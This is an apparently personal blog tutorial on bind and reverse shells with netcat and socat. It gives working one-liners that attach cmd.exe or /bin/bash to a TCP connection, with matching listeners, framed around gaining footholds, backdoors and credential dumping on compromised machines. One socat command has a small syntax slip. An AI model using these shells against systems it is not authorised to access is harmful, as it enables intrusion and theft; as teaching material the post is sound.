Menu

A Showcase of Triumphs

Witness the tangible results of my endeavors through a curated collection of projects and accomplishments. Each triumph represents a triumph over cyber adversaries, showcasing my ability to navigate the intricate web of digital security challenges.

TWITTER
FACEBOOK
INSTAGRAM

Ultimate Guide to Reverse and Bind Shells: Mastering Netcat and Socat for Maximum Security

Hey Hackers!!

I often find myself in the situation wherein i have limited tools that are already installed in target machine as i pwn them, other time i only get to transfer small files to expand my foothold on the target machine, For such reasons its important for me to have a good understanding on the tools i use, some of the tools i use often are Netcat, socat, wireshark and the list goes on.

In such circumstances I make use of my Swiss army knife, which allows me to transfer and gain a shell access to target machine, with a shell i can easily embed backdoors for persistent connection, dump database files, dump credentials and the possibilities are endless.

Today we gonna discuss about two major types of shells.

  1. Bind Shell
  2. Reverse Shell

Lets get into the crux of it.

Bind Shells

A Bind Shell is used in a scenario wherein a target machine has les restrictions to outbound connections. Lets take a example where Bob ( Win) has requested Alice’s ( linux) assistance to connect to his computer and issue some commands. However, Bob has a public IP and is connected to internet, on the other hand Alice is behind the NAT and has a private IP. To complete the scenario , Bob needs to bind a TCP port on his public IP address and asks Alice to connect to it.

To simplify, Bob will check his IP and run a Netcat with “-e” switch to execute cmd.exe as soons as the connection is made to the listening port. 

ncat -nlvp 3131 -e cmd.exe

harshitdodia.tech

Now , netcat is listening on port 3131 on BOB’s IP i.e 192.168.2.24 and should execute a cmd.exe as Alice’s connects to it and should give her a command shell.

Alice will now try connect using netcat to Bob’s computer by triggering following command.

sudo nc -nv 192.168.2.24 3131

Reverse Shells

A Reverse Shell is used to bypass firewall or other network restrictions, Lets say now Alice wants Bob to execute a command but she has no control over the router in her premises and therefore cannot forward traffic from the router to her internal machine.

We can use netcat to send a command shell to a host listening on a specific port, As in this situation Alice cannot bind a port to /bin/bash and expect bob to connect to, but she can send control of her command prompt to Bob’s machine instead, this is what we cann Reverse Shell.

Now Bob will listen to a port 3131 on his Windows.

ncat -nlvp 3131

Alice on connecting to Bob will send her shell.

nc -nv 192.168.2.24 3131 -e /bin/bash

This should give BOB a shell access for Alice.

Socat

Socat is another great utility that you can use to get a Reverse & Bind Shells the working remains the same but the syntax changes.It also comes with fork switch which allows multiple connections

Lets take a look at Socat Reverse Shell.

.\socat.exe TCP4-LISTEN:3131 STDOUT

I’ll start the listener on port 3131 on Windows machine.

on the Linux machine:

sudo socat TCP4:192.168.2.24 3131 EXEC:/bin/bash

now lets check whether it worked or no.

Knowing the difference between Reverse Shell & Bind Shell has always been wrangling crusade among newbies, its important to take some time and try getting both the shells with and without firewalls, I think then only we can make use of these excellent tools to its full potential.

Happy Hacking !!!

PREVIOUS STORY

NEXT STORY

Comment
Name
Email